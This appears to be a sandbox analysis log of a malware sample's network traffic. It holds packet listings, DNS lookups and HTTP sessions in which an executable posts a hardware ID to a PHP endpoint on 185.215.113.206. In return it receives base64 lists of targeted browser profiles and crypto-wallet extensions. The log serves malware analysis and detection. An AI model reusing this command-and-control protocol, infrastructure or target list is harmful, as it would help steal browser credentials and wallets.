Dec 8, 2024 13:31:56.727705002 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.727756023 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.727781057 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.727792025 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.727823973 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.728807926 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.728885889 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.729156971 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.729204893 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.729430914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.729480982 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.782763004 CET	443	49859	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.783109903 CET	49859	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.783133984 CET	443	49859	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.783499956 CET	49859	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.783504963 CET	443	49859	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.840707064 CET	443	49860	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.841069937 CET	49860	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.841094017 CET	443	49860	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.841444016 CET	49860	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:56.841453075 CET	443	49860	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:56.855798006 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.855885029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.855986118 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.856206894 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.856271029 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.856285095 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.856345892 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.856398106 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.856441975 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.857140064 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.857196093 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.857362032 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.857419014 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.857968092 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.858020067 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.858083963 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.858150005 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.858838081 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.858912945 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.858937979 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.859071970 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.859688044 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.859738111 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.859761000 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.859879971 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.860521078 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.860601902 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.860641956 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.860685110 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.861383915 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.861459970 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.861496925 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.861505032 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.862246037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.862287998 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.862355947 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.862397909 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.863158941 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.863204002 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.863257885 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.863300085 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.863957882 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.864017963 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.864037037 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.866194010 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.989921093 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.989979982 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.990068913 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.990324020 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.990448952 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.990504980 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.990566015 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.991087914 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.991182089 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.991209984 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.991413116 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.991935015 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.992021084 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.992043972 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.992115974 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.992549896 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.992628098 CET	80	49835	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:56.992655039 CET	49835	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:56.992806911 CET	49835	80	192.168.2.6	185.215.113.206

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 8, 2024 13:31:25.149997950 CET	192.168.2.6	1.1.1.1	0x511a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 13:31:25.150470018 CET	192.168.2.6	1.1.1.1	0x2a44	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 8, 2024 13:31:31.836108923 CET	192.168.2.6	1.1.1.1	0x7f06	Standard query (0)	ogs.google.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 13:31:31.836258888 CET	192.168.2.6	1.1.1.1	0xf74b	Standard query (0)	ogs.google.com	65	IN (0x0001)	false
Dec 8, 2024 13:31:31.858537912 CET	192.168.2.6	1.1.1.1	0x261	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 8, 2024 13:31:31.859080076 CET	192.168.2.6	1.1.1.1	0x1794	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 8, 2024 13:33:15.345654011 CET	192.168.2.6	1.1.1.1	0x6eec	Standard query (0)	atten-supporse.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 8, 2024 13:31:25.287159920 CET	1.1.1.1	192.168.2.6	0x511a	No error (0)	www.google.com		172.217.21.36	A (IP address)	IN (0x0001)	false
Dec 8, 2024 13:31:25.287178040 CET	1.1.1.1	192.168.2.6	0x2a44	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 8, 2024 13:31:31.973277092 CET	1.1.1.1	192.168.2.6	0x7f06	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 13:31:31.973277092 CET	1.1.1.1	192.168.2.6	0x7f06	No error (0)	www3.l.google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 8, 2024 13:31:31.973980904 CET	1.1.1.1	192.168.2.6	0xf74b	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 13:31:31.995763063 CET	1.1.1.1	192.168.2.6	0x261	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 13:31:31.995763063 CET	1.1.1.1	192.168.2.6	0x261	No error (0)	plus.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 8, 2024 13:31:31.996130943 CET	1.1.1.1	192.168.2.6	0x1794	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 13:31:45.278078079 CET	1.1.1.1	192.168.2.6	0xeff7	No error (0)	g-bing-com.ax-0001.ax-msedge.net	ax-0001.ax-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 8, 2024 13:31:45.278078079 CET	1.1.1.1	192.168.2.6	0xeff7	No error (0)	ax-0001.ax-msedge.net		150.171.28.10	A (IP address)	IN (0x0001)	false
Dec 8, 2024 13:31:45.278078079 CET	1.1.1.1	192.168.2.6	0xeff7	No error (0)	ax-0001.ax-msedge.net		150.171.27.10	A (IP address)	IN (0x0001)	false
Dec 8, 2024 13:33:15.484589100 CET	1.1.1.1	192.168.2.6	0x6eec	No error (0)	atten-supporse.biz		104.21.16.9	A (IP address)	IN (0x0001)	false
Dec 8, 2024 13:33:15.484589100 CET	1.1.1.1	192.168.2.6	0x6eec	No error (0)	atten-supporse.biz		172.67.165.166	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49724	185.215.113.206	80	7368	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 13:31:16.839010954 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 8, 2024 13:31:18.185575962 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 13:31:18.188925982 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFBFHDBKJEGHJJJKFIIJ Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 44 31 30 36 32 30 32 45 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 46 48 44 42 4b 4a 45 47 48 4a 4a 4a 4b 46 49 49 4a 2d 2d 0d 0a Data Ascii: ------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="hwid"A2D106202E0F807656615------AFBFHDBKJEGHJJJKFIIJContent-Disposition: form-data; name="build"stok------AFBFHDBKJEGHJJJKFIIJ--
Dec 8, 2024 13:31:18.645587921 CET	407	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:18 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 32 49 31 4d 6d 49 33 4e 44 45 31 5a 6a 5a 6d 4e 32 4a 6b 4d 47 45 32 4e 54 51 77 4e 32 45 31 4f 57 5a 6c 4e 44 55 33 4d 57 4e 6c 59 6a 55 30 4d 7a 68 68 5a 44 68 6a 4f 54 46 6b 5a 57 4d 34 5a 6a 5a 6d 4d 7a 68 6a 4e 54 6b 77 5a 6d 49 33 4e 32 4a 6d 4d 7a 63 31 4d 7a 4d 79 4e 6a 4d 35 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: M2I1MmI3NDE1ZjZmN2JkMGE2NTQwN2E1OWZlNDU3MWNlYjU0MzhhZDhjOTFkZWM4ZjZmMzhjNTkwZmI3N2JmMzc1MzMyNjM5fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 8, 2024 13:31:18.648529053 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHC Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 2d 2d 0d 0a Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="message"browsers------BKEBFHIJECFIDGDGCGHC--
Dec 8, 2024 13:31:19.096910954 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:18 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 8, 2024 13:31:19.096932888 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Dec 8, 2024 13:31:19.105528116 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="message"plugins------AFHDAKJKFCFBGCBGDHCB--
Dec 8, 2024 13:31:19.550025940 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:19 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 8, 2024 13:31:19.550103903 CET	124	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
Dec 8, 2024 13:31:19.550321102 CET	1236	IN	Data Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
Dec 8, 2024 13:31:19.550388098 CET	1236	IN	Data Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWN
